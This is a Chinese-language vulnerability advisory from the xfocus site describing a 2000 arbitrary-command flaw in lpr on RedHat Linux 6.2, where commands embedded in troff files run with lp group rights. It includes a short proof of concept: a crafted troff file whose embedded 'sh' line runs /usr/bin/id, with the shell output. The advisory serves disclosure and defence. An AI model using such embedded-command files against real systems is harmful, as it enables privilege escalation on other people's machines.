xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

RedHat lpr可执行任意命令漏洞


发布时间:2000-10-26
更新时间:2000-10-26
严重程度:
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:服务器模式

受影响系统
BSD lpr 0.54-4
   + RedHat Linux 6.2 sparc
   + RedHat Linux 6.2 i386
   + RedHat Linux 6.2 alpha

其中RedHat Linux 7.0 不受影响
详细描述
lpr是UNIX的打印工具,在REDHAT 6.2中lpr存在漏洞允许以lp的组身份执行任意
命令。漏洞问题是在处理troff文件,他们转化为postscript时候产生的。当处理
时,嵌在troff文件里面的命令可以被执行,这个导致lpr配置文件破坏。

测试代码
[zen@continuity /tmp]$ cat asdf
PS
sh D/usr/bin/id>/tmp/yougetanyideasyetD
.PF

[zen@continuity /tmp]$ lpr asdf

[zen@continuity /tmp]$ cat /tmp/yougetanyideasyet

uid=500(zen) gid=500(zen) groups=7(lp)

解决方案
暂时关闭lpr程序。

相关信息